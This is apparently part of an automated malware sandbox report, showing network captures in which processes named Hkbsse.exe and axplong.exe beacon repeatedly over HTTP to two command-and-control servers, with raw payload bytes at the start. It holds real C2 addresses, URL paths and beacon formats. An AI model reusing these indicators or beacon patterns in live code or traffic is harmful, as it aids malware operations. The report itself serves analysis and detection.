                                                                          Sep 27, 2024 04:22:02.175467014 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:22:02.175498009 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:22:02.175532103 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:22:02.175565004 CEST448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:22:02.175596952 CEST1236INData Raw: 09 44 d3 e0 e7 0d 67 80 b3 0c 5b 80 e1 aa 86 1a 60 18 1f 5a ef 0c d0 72 1f 9c a2 51 ca 22 67 61 85 0d 27 4e fb f7 33 30 4b a5 24 17 11 2e 5b b8 cd 5c bb c3 c4 5c 25 1f 77 6c 85 d0 f7 78 1e 41 7e 3c f3 9c 29 f0 1b 2c e8 44 f7 18 3d 1d b3 83 85 1c
                                                                          Data Ascii: Dg[`ZrQ"ga'N30K$.[\\%wlxA~<),D=f$"|:p1y$W\mNyA<0{W5^^Yp-<(>'\2+!I8<HA$xPp$13P|0;{[1H5k<LG
                                                                          Sep 27, 2024 04:22:02.175630093 CEST1236INData Raw: 99 3c 44 cc 4a ec cb bc e8 1d 7b a3 c4 fc 28 5d 60 15 c3 d9 8f 3d e7 33 fb 57 32 50 2f 11 04 35 e9 40 c7 5e b5 0d 70 30 79 a4 a4 89 e9 24 b7 5c d8 17 c7 5e 19 0d c4 7a c9 8a c3 40 1d 05 ba 23 11 7c 86 fd 26 3e d0 91 a9 2d 23 d0 d3 3d d0 7e f6 84
                                                                          Data Ascii: <DJ{(]`=3W2P/5@^p0y$\^z@#|&>-#=~_ov$W6y0'd$i0Y^pS>> L~7H<9H@5c;$<Yil#T0|'4bX$$j<AEF 0#,d\D*@-$7U
                                                                          Sep 27, 2024 04:22:02.175662041 CEST1236INData Raw: 45 15 35 8e 89 69 23 d4 bf a5 6a 21 64 61 ab 61 79 63 f0 5e aa 44 23 58 57 1b 0f 30 78 64 47 16 79 0c c8 21 8c 51 cb 19 24 24 b2 68 bb fc 73 14 63 a7 e8 c7 b6 57 f5 1a 06 f8 0c 56 7e e7 40 e4 e1 90 49 32 04 9c 42 62 e7 ec c5 44 db ec db 2e d3 e4
                                                                          Data Ascii: E5i#j!daayc^D#XW0xdGy!Q$$hscWV~@I2BbD.LTdyt<O@tjpkB0/)0H\pAv[agS`s\ *U@"<ZAxk;z@;IGp+3 =MT9HtH7'
                                                                          Sep 27, 2024 04:22:02.175694942 CEST1236INData Raw: ff e7 fe ac d0 00 e4 3e e8 06 83 5d db f3 35 f8 ea 90 7f c5 50 6d ba 49 cc c8 a0 49 11 5c 6a 43 7d 56 0f 3c 82 0e 33 47 00 c3 49 68 c9 44 27 72 f7 fe 52 9a 1d 61 bb bc 3b be 6a cd ec 1c c9 04 1e 2b 10 9c 41 db 5d 94 fd c4 2b 9a 65 dc be 70 be fc
                                                                          Data Ascii: >]5PmII\jC}V<3GIhD'rRa;j+A]+ep{~/(w* n5 =00S($t>F^b?"Gx-{b`ZgMiW*Y(%LQ6,{~p[?jE`a.14rk}@mI=8
                                                                          Sep 27, 2024 04:22:02.175728083 CEST1236INData Raw: f1 45 6b 62 fe 2c 5b 10 05 c4 ed 88 43 2a f7 50 37 b1 a5 1e aa 7f 5d 1e c8 67 37 90 23 f4 83 b0 b8 93 97 ab a6 7e 95 35 59 78 06 f9 d9 80 bf a5 9b d0 bf d5 c4 a8 85 54 f7 b1 d0 3e 03 6f 3e 48 9d 9b 3c 95 be 7c 7c 61 50 40 74 3d ab 0c c7 9e 88 a9
                                                                          Data Ascii: Ekb,[C*P7]g7#~5YxT>o>H<||aP@t=bp-GJBN*:cPQ'_"(a9q3>$QA#h'nM'4ZklP1q5'$|?uWy3[)JvrBta fYH[x'A
                                                                          Sep 27, 2024 04:22:02.180674076 CEST1236INData Raw: 39 4a 4b 19 31 2f b4 89 fb f2 cf 9c ea 91 7c 13 41 e3 3b a4 2e 6a 63 1c 44 0c 85 50 8d 3e 80 71 df 17 15 40 8e 68 63 bb f0 03 52 e1 0d d4 45 95 f4 00 2c 67 40 e4 85 42 a0 e0 fb 5c 4e f0 d2 ff e8 54 c7 05 a3 30 01 92 7b 40 15 33 e9 40 bf 5a e5 0d
                                                                          Data Ascii: 9JK1/|A;.jcDP>q@hcRE,g@B\NT0{@3@Z<aH7uf?uI1[mC\.,{g]HQp:)/8w;2?\1)H4y+W%2.@+iSCX-1;KR.(}1Lmni


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          72192.168.2.549813185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:01.548355103 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:02.251425028 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:02.259953022 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:02.499788046 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          73192.168.2.549814185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:01.830405951 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:02.513273954 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:02.514084101 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:02.738981962 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          74192.168.2.549816185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:02.639527082 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:03.353988886 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:03.403779030 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:03.647681952 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          75192.168.2.549817185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:02.956470013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:03.657633066 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:03.749703884 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:03.979695082 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          76192.168.2.549819185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:03.959166050 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:04.647458076 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:04.668194056 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:04.900230885 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          77192.168.2.549820185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:04.282638073 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:04.957171917 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          78192.168.2.549823185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:05.119806051 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:05.806864023 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          79192.168.2.549824185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:05.120016098 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:05.837939024 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:05.880738020 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:22:06.121848106 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          80192.168.2.549826185.215.113.1680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:05.988178015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:07.426043034 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:07.426234961 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:07.427252054 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:22:07.431782961 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:22:07.653465033 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:07 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          81192.168.2.549828185.215.113.2680
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:22:06.373513937 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:06.665585995 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:07.056168079 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:22:07.427237988 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:22:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
